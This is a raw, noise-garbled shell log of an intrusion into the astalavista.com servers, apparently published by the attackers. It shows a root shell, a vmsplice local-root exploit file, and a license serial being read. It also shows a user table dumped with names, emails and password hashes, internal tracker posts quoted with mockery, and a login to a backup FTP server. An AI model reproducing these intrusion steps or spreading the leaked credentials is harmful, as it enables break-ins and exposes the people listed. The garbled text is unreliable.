. H* K/ m8 e1 C8 u! q7 h3 I5 Z, C-rw——- 1 com com 21880 Jun 2 08:07 .bash_history( z( n/ A6 \3 ]. R
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
4 H5 ]1 i8 Y" O4 S% Q6 r-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile `; a C' E4 v$ U- _; N5 h3 |5 E
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
7 x3 l0 F- V+ {/ X' O& edrwx–x–x 3 com com 4096 Jan 29 2008 domains/ l% e# o1 ], ?# U/ n0 ~( Y0 g( m
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
- C8 ?+ A' j7 L& K. M4 pdrwxrwx— 3 com mail 4096 Jan 6 19:24 imap
) u o& I9 e" e8 _5 W" c; V-rw——- 1 com com 69 Nov 18 2008 .lesshst/ |5 J9 Y" \5 R# B
drwx—— 2 com com 4096 Sep 24 2007 mail; z; V% J+ @. n/ L
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
% J! t- z. N0 \3 o! \% `1 ddrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp0 S$ J4 r6 O+ e9 K) [5 b* k
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html5 r+ p1 h4 X b, M
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow @- c& [* {6 d8 D) A
drwx—— 2 com com 4096 Aug 26 2008 .ssh+ B) h( ~* f/ Q; S! u
-rwx—— 1 com com 8515 Feb 10 2008 t
0 S& p% ~( T9 p1 w# G- G$ E-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c% U o7 B# \* K& A4 r+ A, c
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
; m' o' Z L2 I- F1 C5 z9 f-rw-rw-r– 1 com com 617 May 20 2008 .toprc
2 H, `; s4 j+ [) ]$ D& V8 l5 W7 i-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
0 E2 @3 Z0 ~) |* R-rw——- 1 com com 16629 Mar 28 21:46 .viminfo( s- N7 u0 u4 y$ N, ^
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc. Q% {1 P: V& d
5 Q% C) @5 Q7 ^: a& X: M
sh-3.2# head t.c
; z1 X4 V/ ^' ~+ H F7 i/*6 O1 B; Q" {2 k* m# |
* jessica_biel_naked_in_my_bed.c" g5 {8 D, }! U( T: D0 g
*
' X; C9 u- l* X: }* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
5 U; |, W; A, x0 w; }' \* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
; l# i j- p2 h' d' U3 S4 X* Stejnak je to stare jak cyp a aj jakesyk rozbite.
! n3 |% E( i' C3 d7 b$ l*0 |5 R0 t: P/ s, ]3 G$ j. R
* Linux vmsplice Local Root Exploit2 s( C4 y$ R/ Q% {) _) V0 ~& D
* By qaaz" [/ f4 k( t# ^+ Q
*
: `! o1 G0 k1 y' N1 o7 U2 t" W7 `0 n' h( f1 a0 K: x" p
sh-3.2# cd /
1 J% g# L2 q' K! ^. ` _sh-3.2# ls -la% L- A* l0 {2 @" d
total 360
$ |+ ?; C+ e$ @, V) i$ [drwxr-xr-x 25 root root 4096 Jun 3 02:43 .1 U! m9 Q! X$ a; `, J, Y
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..% }+ r L* z2 s" ^: q4 Y6 t9 h
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group- z+ C& g9 K) n j% ?# r
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user6 ~* Y8 B. o: M9 D F: A8 J
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
. a$ J" F. { d3 r1 B H% D-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
4 b) A% U, Q& B) }8 r4 P-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel$ m# v! D- q! A* }: e
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
* g( H, }8 `6 V2 A9 ~' T0 sdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
* w, a3 |% B7 m2 ~' @drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot% B9 Y" }8 e- X' i: x
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev! L: }+ T ~4 W- ?5 j% |& y
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc2 |0 h- k! f$ f4 z* G9 S( l9 c4 q
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
% F/ O/ l8 U" V8 h-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf% H, W8 y, h+ }8 d3 s1 }
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
7 z+ o4 K0 [. D1 ?drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
3 ~- k3 I. U9 q; _/ J$ jdrwx—— 2 root root 16384 Sep 11 2007 lost+found
( k. t* W( o. Z% ddrwxr-xr-x 2 root root 4096 Mar 11 17:56 media" q( ]+ v7 }1 j. q
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
/ u" t4 n ]8 s D8 ^1 ^drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt, e8 X/ E. |( }' I
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg- F* j" M+ [0 a( ?) ~+ P" J
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
8 S2 e: S' Z/ H( A: o/ ?drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt" Z& `, i1 ~: p* h6 H
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
8 o. ]0 _. y! a* i' F& M4 ldrwxr-x— 15 root root 4096 Jun 4 08:40 root1 T) \( R+ B: O8 L: ^5 E$ J" Z1 m
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin. X! A6 M/ {6 H0 v, M6 _% b
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux' U1 `9 k( s, _9 u/ i. Q- @4 ]6 L
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
# e9 r$ \' m$ V: {4 l4 _drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
; G' x' U- F& ~4 ?$ b7 w% Pdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
5 p# c6 o# O8 \7 l/ w- Tdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr$ f# I" W7 l$ X8 ~7 h- [( U
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var
+ a& G$ u4 H! O1 U& R8 S$ p( s9 r
1 D8 ?4 W) O" Fsh-3.2# cd opt
- }+ ]0 }) P" B% n0 G# Ash-3.2# ls -la% d, l- M4 R* c7 W! k0 W; a) N
total 20
. C4 }6 d* X3 `! R! X8 ydrwxr-xr-x 3 root root 4096 Mar 11 17:56 .5 o: H- J# _& E9 ]* b
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
; p* q+ L" ]$ u4 y; n. ldrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws8 W; a3 i9 v7 ~2 h) `
1 D5 ^* k) m5 ~* t. e( ~9 q0 P R8 |sh-3.2# cd lsws/0 z$ r; `& I2 O. A
sh-3.2# ls -la% s8 b# ~$ }; i. U5 y/ G6 D
total 108
2 T% U9 I' |) F3 Y5 x8 Ldrwxr-xr-x 15 root root 4096 Mar 20 2008 .' E, X$ ^: g/ Y# E
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
+ d' N& B8 A1 a0 d& v) i7 f4 o# sdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
2 }: A+ U- m8 odrwxr-xr-x 13 root root 4096 May 29 15:10 admin
; {1 V' N6 O$ ydrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate. b7 R9 ?2 W$ @$ p
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
% Q- w1 l* Y% V' p) _. w5 Edrwx—— 4 apache apache 4096 Jun 3 02:43 conf0 Z9 L9 r' R, a+ V9 w( H
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
9 w6 g* X5 K# }drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
1 S9 D5 \- u! r; z1 odrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin! J; z. R* c- ~8 R' R5 Q
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib, W4 I: j$ a4 z+ I1 M
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE& t1 l' Y% i: l3 z9 |7 B U
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP! R; k1 [7 T. |2 Y. Y" A8 K0 H
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
q4 L8 W! m1 }0 u# A8 y-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP+ ~' N1 z1 O, \& c; Z9 V0 }4 K; e7 Y
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs" J+ e& Z8 _8 ]- @/ s: J
drwxr-xr-x 2 root root 4096 Mar 20 2008 php7 S; E) a4 \4 l- Z! e' p4 {# R2 k: G
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild+ [: M& j+ \2 x* j! `8 X
drwxr-xr-x 3 root root 4096 Mar 20 2008 share3 ]6 K1 P: Y1 L( C0 L0 t q9 M3 L4 J
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
) v* }+ t4 h5 O O
* K% [+ V8 j: s" Z" O' `sh-3.2# cd conf
6 ?9 c& }* X; t# [sh-3.2# ls -la$ a$ ], z! Z3 ?0 l. Z; J" K
total 48 u9 X4 l, S, P \1 s5 b$ }8 A
drwx—— 4 apache apache 4096 Jun 3 02:43 .
5 v6 J, F* O& P# p: ?) B! ]/ ydrwxr-xr-x 15 root root 4096 Mar 20 2008 ..9 F+ ]. D# T; u# t
drwx—— 2 apache apache 4096 Mar 20 2008 cert0 k" X H+ s' f0 @3 c3 q
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml: H' G4 F. b4 j6 }& l+ t7 o
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
/ ] _ m+ L% Y }' U% m0 f-rw-r–r– 1 root apache 0 Jun 3 14:11 .last2 @. B3 m% ]- g, V; w! m$ k
-rw——- 1 apache apache 256 May 29 15:10 license.key9 e3 U7 P+ _; f1 s1 P( F; O0 U
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
- B, T( ]0 q7 l-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
1 u/ ]) e/ O# V4 [7 k& l# y- d-rw——- 1 apache apache 20 May 29 15:10 serial.no! J1 f1 P j: Y6 Q4 _
drwx—— 2 apache apache 4096 Mar 20 2008 templates8 N9 U0 {+ y+ Z) u a
: d9 V5 L8 S, a5 X5 O/ _sh-3.2# cat serial.no
3 h* V: a; _" t, t% SIbDl-oVsO-CKqL-wVRa8 G5 [3 j4 J, j8 p& B) m# i
* z6 F, E- q3 `0 ?/ g* a, y
sh-3.2# mysql2 x. g U$ m* F2 Z6 V$ Y) M
Welcome to the MySQL monitor. Commands end with ; or \g., F% T$ Z9 Z% p" M& `% O% c8 ^ N1 G
Your MySQL connection id is 286844
* F b4 \$ J" a$ a; b2 RServer version: 5.0.45-community-log MySQL Community Edition (GPL)
# u$ _5 T% T. O$ s( }, m) i7 w4 Y. ]9 y9 \% ?( W
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.2 p6 T+ }. U/ r7 Y
% E5 E x( K0 U- [/ R; r8 E
mysql> show databases;$ }3 Q1 j% s" N" {2 S( G+ P
+———————–+
4 u, _+ y8 C6 P9 C0 m| Database |
# k' p: Q; p) H. K5 Z) e! x0 t: U+———————–+9 b$ ]" A8 o1 d
| information_schema |
+ ?" s4 M O6 O$ D1 U' y2 U| astanet_ads |# P, c( X* ? z
| astanet_mailing_lists |" r! r6 T* w7 q. R' V9 F" o
| astanet_mediawiki |, k1 z* @! |: p5 X7 M% i
| astanet_membersystem |
$ j4 c, c: H% r) `| com_contrexx |( P) i5 Q+ D/ y* W# h" I" f: K
| com_contrexx2 |
/ S. [9 W' M9 p1 [2 w| com_contrexx2_live |! J# K& T. c4 [3 w ^; f d& w
| da_roundcube |
: m+ c7 W3 G' P* q| dolphin |% m6 J! y! T& ~/ l, k
| ideapool |
+ X, s( o, ?6 z( z| mysql |5 c$ w _% W6 ]/ [
| test |4 o5 k' y9 f8 k( v; t* P3 Y% w( j
| yourmaster |" f: u) V3 c; M
+———————–+
+ g6 q& r- h( M* b( N14 rows in set (0.00 sec)6 H3 }# d5 P- O' }& Y
, X/ v" }6 W3 y3 R9 q( c0 A
mysql> use ideapool
$ F) ~/ |" T' B& m# l' qDatabase changed
: a5 P$ f2 \, _4 T; {( |1 ^% [mysql> show tables;6 Q6 q) S- [) r, i- o d# c
+———————————–+
7 E+ [; K( ?9 b| Tables_in_ideapool |
& J4 u9 c8 W$ n) H2 v1 A5 G+———————————–+. S5 Q+ J, Q+ h5 V4 H
| eventum_columns_to_display |
1 k9 Q6 _; N" Q& {% q' H| eventum_custom_field |/ ^2 x# v7 G/ f, U! W& `
| eventum_custom_field_option |* y) Z9 Z5 m3 \
| eventum_custom_filter |
& `# V1 ?9 G s! O0 X0 || eventum_customer_account_manager |, {3 j: W* t5 Y" j, ~8 w \
| eventum_customer_note |
2 V* L/ P/ [0 f. o! b- f5 f| eventum_email_account |
2 ^3 i. T# G' s: {% Y8 e: X- A% A| eventum_email_draft |' X3 k' f- K6 v9 V9 Z
| eventum_email_draft_recipient |5 l9 ^% n1 E. \& }! z6 K6 e
| eventum_email_response |- a7 U) A5 i2 ~, D/ ]7 B( k
| eventum_faq |5 G* a! k) G: q/ g# N
| eventum_faq_support_level |- u- ~" o* d$ O2 `/ z$ S
| eventum_group |
. ^( X* N( ]7 p6 Z| eventum_history_type |9 J# g9 d9 V* e9 C: O
| eventum_irc_notice |+ O) `* w% U1 s/ a# b7 L3 {& m+ [4 [
| eventum_issue |8 z* [' l' E; O7 v% Z, t
| eventum_issue_association |
8 _; S, e/ K) r| eventum_issue_attachment |2 y- u% r- f0 \7 s' \, Q! H
| eventum_issue_attachment_file |
, Y$ E; S* w3 |4 [. ~$ j; _4 w| eventum_issue_checkin |
6 [7 p$ i7 r5 O: r9 `| eventum_issue_custom_field |
6 P# ?" c$ k6 ^- [. g+ l! x% f| eventum_issue_history |0 V+ n$ l' D% H9 E
| eventum_issue_quarantine |, h7 m0 D2 g/ x* N* ?
| eventum_issue_requirement |& K# ?8 A5 r$ S' ~3 ^) |' S
| eventum_issue_user |; ^ o) L* ] F$ t! }
| eventum_issue_user_replier |
. d6 S2 v& ^* T8 D: [ F| eventum_link_filter |7 c4 ]8 O) ~. b" f, G n% ~5 N
| eventum_mail_queue |4 n. L% e9 Y" T3 z x+ O: x/ p
| eventum_mail_queue_log |: `/ D7 k' x+ W! G- n( M% J2 Y
| eventum_news |7 h! }5 @4 U1 @3 v
| eventum_note |5 i1 a" G! d: ]$ b. X
| eventum_phone_support |
( o# R. r8 i3 P0 i8 z| eventum_project | {$ i! t$ {, X7 [* u: L1 i$ W' p8 V
| eventum_project_category |+ s8 I1 P, i! v9 h' B( u" a# I
| eventum_project_custom_field |! G7 F; I) ^6 b( F3 R. d
| eventum_project_email_response |. d6 U- ?9 [* V. e7 p
| eventum_project_field_display |
e" B9 H! q+ q: `% D2 {| eventum_project_group |' L0 v2 c( H( C5 O% b$ [+ M! K9 R
| eventum_project_link_filter |- r7 P* ~) Y+ y( M3 e# ?3 H
| eventum_project_news |
" f. X; v. Y7 q| eventum_project_phone_category |
( z( U$ f8 l0 d( g4 o1 c| eventum_project_priority |
i; c* b$ M1 |7 A1 s6 S4 ] k| eventum_project_release |* i0 U$ i' D" B9 \$ N$ O
| eventum_project_round_robin |2 E% H% i0 ]* m, g! U
| eventum_project_status |2 y4 l$ e0 S9 z$ l& p. N4 p
| eventum_project_status_date | @5 l: U4 J* a+ ~. p6 l$ B$ E
| eventum_project_user |2 R4 ^, A7 V7 p0 u
| eventum_reminder_action |4 ] I4 C0 a7 P' @$ @, o; e
| eventum_reminder_action_list |- {/ w4 T, @0 _( X ^. `& }
| eventum_reminder_action_type |; o2 [, t" Z2 @6 L& ]1 O
| eventum_reminder_field |
# z+ {, O9 y: U2 Y1 o! a; S% b- m& {| eventum_reminder_history |
8 [9 D4 G8 I V$ b9 ^& S( W| eventum_reminder_level |
& L t( x& r6 P# {" _| eventum_reminder_level_condition |8 W3 P2 c3 Q% r2 d! U D1 `) h
| eventum_reminder_operator |; T" [: T6 E T$ P& t9 u2 [
| eventum_reminder_priority |
( d" X- J! i6 j0 p4 n| eventum_reminder_requirement |2 \) y! A0 b4 N# W! [
| eventum_reminder_triggered_action |1 e0 P7 P4 P9 r1 g
| eventum_resolution |
+ J( E4 n/ y0 z. p" |1 T) E| eventum_round_robin_user |
, d* J! G/ B' L1 E% t8 H| eventum_search_profile |
$ Q" c3 I: `0 A0 U, X1 k! v( z| eventum_status |
! ~3 c8 B8 w, N1 v* X6 ]! d* C| eventum_subscription |! s" R1 h2 y. y% g! h2 y# j
| eventum_subscription_type |
. J. U* L- j$ M& C( ^! c| eventum_support_email |
/ U5 R: [! Y5 M0 m6 R| eventum_support_email_body |
' I7 C" u3 y% A| eventum_time_tracking |
: l1 W7 A5 Q2 q; l8 |7 S| eventum_time_tracking_category |
" g- Y/ l( A9 s' B, Y; |8 N| eventum_user |, M% z! Z/ ?1 b3 c( w \1 u
+———————————–+) i$ R8 `3 s$ P
69 rows in set (0.00 sec)( v3 `2 L3 E) p% \ l! N) q' z, O
1 l- k/ N1 @2 f3 V
mysql> describe eventum_user;7 F$ H9 _/ }+ y: a+ o
+————————-+——————+——+—–+———————+—————-+% ?) ~; Y0 f( l" z7 `, h1 k- P
| Field | Type | Null | Key | Default | Extra |
; \; ^ e) R; V" L& _( n0 ]' K+————————-+——————+——+—–+———————+—————-+
3 `' ^& j0 {% L8 l| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
M- D) D8 z* k8 ~) C& r| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |, G- \# m" C' u4 H- S
| usr_customer_id | int(11) unsigned | YES | | NULL | |
" \3 B: X9 F4 Z' W- i4 T| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |" n$ G c, \: }' g
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |; |. N. W6 @# W1 a" j
| usr_status | varchar(8) | NO | | active | |
% K: Q& K' @3 \) j| usr_password | varchar(32) | NO | | | |6 z& h V" y9 Z, u: B1 L. ~& h: N
| usr_full_name | varchar(255) | NO | | | | z# Y! r. L: f2 @) e9 s! S% @
| usr_email | varchar(255) | NO | UNI | | |
5 ]* H- g% Q1 Q! m. c/ C| usr_preferences | longtext | YES | | NULL | |& b3 [3 e0 Q+ H* Z
| usr_sms_email | varchar(255) | YES | | NULL | |
# l; \ H4 E& b6 X6 P% b6 c& a| usr_clocked_in | tinyint(1) | YES | | 0 | |
+ t- X( v* ^3 \| usr_lang | varchar(5) | YES | | NULL | |
. Z# t# t i: l; I+ p O+————————-+——————+——+—–+———————+—————-+4 s& `6 q+ Q1 `2 I& B+ |( w7 \: s( V
13 rows in set (0.00 sec) x! w( M& O5 x2 E W
" Y k/ C z! j( e ^
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
4 C! \! j3 \5 z/ s0 `5 Y' S+———————-+——————————-+———————————-+
! j4 a0 D- M3 F| usr_full_name | usr_email | usr_password |0 a; G& e; H1 U- W2 ~; H
+———————-+——————————-+———————————-+( S/ Y8 ?, @. Y% [
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |+ j# {- B' _* o+ s8 L7 t
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
+ a% k3 g, x1 ?) P2 f- N| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |: q) ]+ }' j" W8 B
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |* }/ D0 Z0 O9 M5 r- n) f; k+ T- D$ @
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
1 f6 n2 y4 X2 |4 p% i# b5 V1 Z/ T| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |) R* j- u# Q6 M9 k0 {1 A2 D
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
u" q' a( W7 Q3 F& B) ^: v| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |# t! _ e: {( z" P5 O/ I( L
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
* x! [0 b2 [. S| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |0 k& U. V/ X# i: I3 |; M
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
6 r4 z1 B4 V9 v9 K| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |7 f9 ^) s6 S& w* E/ Z# U( z
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |# {% I; x/ O" w; F
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |1 O. @: ^+ E$ M
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |( S( I& v# h3 @0 v! `8 \* ?
+———————-+——————————-+———————————-+
+ O+ M3 Q1 ?8 j* O [0 ?+ Y+ y15 rows in set (0.00 sec)$ W# b& ?8 K5 c2 C( m, E+ {
) D7 F8 I- ?# b: n: t
mysql> select iss_description from eventum_issue where iss_id = 43;4 s. Z+ k4 q' }7 x/ `1 u8 x0 ]
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+2 u( Z" M1 p: @9 {, G$ q# t. x
| iss_description & D! X( t# F) N- I5 [
|% M3 E: w* t- J6 Z
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+4 J) w4 S7 P$ P+ }7 A
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be+ c- j$ T# w: ^9 `
connected for 90 mins… 120mins… so what i propose is something like:
( N% B' B# `* C链接标记[url]http://www.surfthechannel.com/[/url]
/ n8 X3 [& a( q* K H# c4 Bsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system# F- @9 `* R+ o7 ?8 A1 v. T
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t" R# z+ H( m+ O; G% s$ \% ~
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
% S; h5 h0 I9 I+ s9 S" W! Nif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
# S7 n4 ~# l# M7 u" e1 }% P' m& m
( e2 x" ?4 H0 `/ d' EWe could also put advertisement during play on the flash video player itself… extra $$…7 A e5 G7 j) N/ @4 q8 ?
; @7 l0 \+ J; p) m) h
By sykadul |
% s5 Q/ B1 o* z0 e+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+2 I1 H* d" A, w6 L$ o/ S
1 row in set (0.00 sec)4 O7 q: O3 H L) w1 p9 ^/ O
$ q0 J7 e4 c! {; p4 r
// Money and extra $$ is all they care about. remember that.# H$ ?. ]9 M3 _, a/ K) z
/ M* {8 T& h( Q* Gmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
$ G+ K! \; [$ w: l! b8 U' L+————————+——————————————————————————————————————————————————————————————————————————————-+
! P& W* V& l1 g- Y, g| iss_summary | iss_description
$ I% ?3 U7 m/ a! }0 D|
3 p/ B) x5 L6 U+————————+——————————————————————————————————————————————————————————————————————————————-+
: z; b" q2 g3 X! f2 S| Forum for REAL EXPERTS | Hello,
3 |7 u7 K3 o% n6 R; I/ s
7 p! y% T. y8 D4 ^6 Q! l6 I# N, N3 `Ishtus and I,
" P' H1 B* p7 D. ?0 ^6 w8 F! z. T0 Q3 O! J
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
5 ^* v c, D4 L1 @* _ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..* W A! g3 ~2 O* w0 @+ j
# f4 {& B$ z5 [8 x! cOne example a friend of mine from coresecurity.com!5 W- k) L6 F2 p- T
) h f% Y7 j; H$ VWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
/ Q; E$ T$ |) C5 b d
. ]' P2 X$ K, J% \& q|
9 V8 l& l q( x8 m+————————+——————————————————————————————————————————————————————————————————————————————+5 X+ y/ `- T% c/ t$ u0 j& L7 V
1 row in set (0.00 sec)
( p' v& k2 u/ C. z1 y! i5 O/ ]2 T2 p) T/ \4 z1 M
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…4 e, Z* J5 N- G% ]' ~
3 {% i" Z; n2 F5 u* ~% Gmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
5 z1 Q( l4 n( t0 }8 {, J4 p) h+——————+———————————————————————————————+: w* ^& C0 y7 R( N! a5 t h
| iss_summary | iss_description |7 F m, T; t. O5 [" Z6 r
+——————+———————————————————————————————+5 ^. C+ W: u, z$ E o, K7 {; \4 R
| Website guidance | Virtual Girl which guides you trought the website. z( w" [% o5 ]
& s8 r& T- v1 E' T5 g; DWe need a girl with who you can ( talk )!!!
6 D h* e( g5 K* eAlso for the News!* j5 U& \/ {' l6 j2 m8 U) F
So my suggestion is a girl who read you the news loud if you like!5 W& L# J# r A' d! B. [4 d
you can choose between read yourselfe or she read it for you or both!
i% c4 v2 V. ]5 g6 C7 W$ h) H% p3 _! r- v1 e9 }
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
! g; o& m: m# w2 r2 K8 q: v' i2 |% ]' U& ]# R+ D& T0 G
Have a look on the example girls!!
+ G3 k) V- E! r8 G q: `4 w& ?
& ?' n/ ~. l8 s2 U链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
% W V6 C2 y6 q4 h, V
4 b/ G; d3 N6 `; D2 Hor that! U8 Z5 {, a: J
% G3 G0 o8 z2 ~! H2 o9 ~1 l) R5 L
链接标记[url]http://www.yellostrom.de/[/url]
# N: n% F; \: u+ J$ m8 {: a; o' |$ e) h3 `
|
8 x7 y$ g& T# b# A' x e8 o+——————+———————————————————————————————+$ H. @& H9 [* ^7 }
1 row in set (0.00 sec)/ {5 R9 ^" k/ y1 m
8 w3 N. Z1 V8 j9 ?// ha ha.4 d* F% j2 p, C! s' A6 I
: w" J" r0 Z" E& A# ]/ F1 Z
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
+ O3 m7 P0 |+ Z- p+————————–+———————————————————————————————————–+
2 @ K% B5 ~- K# D' `, E9 V| iss_summary | iss_description |
$ z# c# M- }& a/ V; L+————————–+———————————————————————————————————–+
" W* H+ L5 E5 f% f, z( u; S| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
8 k: i; _# H9 O z8 y+————————–+———————————————————————————————————–+
9 v" H6 `; v, d$ N6 V' u1 row in set (0.00 sec)% Z0 x+ r* x# B4 `% r/ P
K, k7 I- f! T. N4 h1 {
// LOL.1 m1 C: J1 i& ^# r+ ~
8 S# V; M$ n/ B; qmysql> exit7 U9 i& ?' s) \
Bye
* T0 v) `* Q; p8 C1 P3 f9 |! b( k4 a9 n1 Y
sh-3.2# ftp 212.254.194.163
* |$ [/ C& C ~3 p2 b, BConnected to 212.254.194.163.! f% D# J5 z9 G0 |1 @0 D' {/ F
220 BackupCOM_VW FTP server ready.9 Y" H& F" o! p, a* Q: j
504 AUTH: security mechanism ‘GSSAPI’ not supported.# M6 K7 U7 y/ H
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
5 S4 m* H) E: w) P: ~+ ?9 A. m( ZKERBEROS_V4 rejected as an authentication type/ s A d4 S- U/ F' w
Name (212.254.194.163:root): astalavista.com" C8 H1 y5 @, X/ `. m
331 Password required for astalavista.com.. w; s4 {8 u) N& g, \
Password:
" u3 I, v1 n2 {6 t* K0 M* `+ L* z230 User astalavista.com logged in.& L( R+ C1 s% F
Remote system type is UNIX.
3 v% @$ J$ e. SUsing binary mode to transfer files.
0 R1 K( H" V: U) Q( Gftp> ls -la
: _8 {5 B* x% @# o, R! h- f$ Y' d227 Entering Passive Mode (212,254,194,163,2,188)
, l; j2 C: m* I% l150 Opening BINARY mode data connection for ‘file list’.$ t4 w* @+ j' ]1 X# R
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com; c* L% _& G4 z6 ?! o& j" t
226 Transfer complete.
% D6 i# u S2 d+ I! dftp> cd astalavista.com. H' T4 G# G3 I5 l- t% p! D: c
250 CWD command successful.6 a4 }$ P7 f& T9 m
ftp> ls -la
" V7 a. @! T9 K! z% U0 b227 Entering Passive Mode (212,254,194,163,2,189)8 t" N' E6 |- P) Z1 a; E/ c5 a) y7 q
150 Opening BINARY mode data connection for ‘file list’.
; h0 u+ Y8 H+ d-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
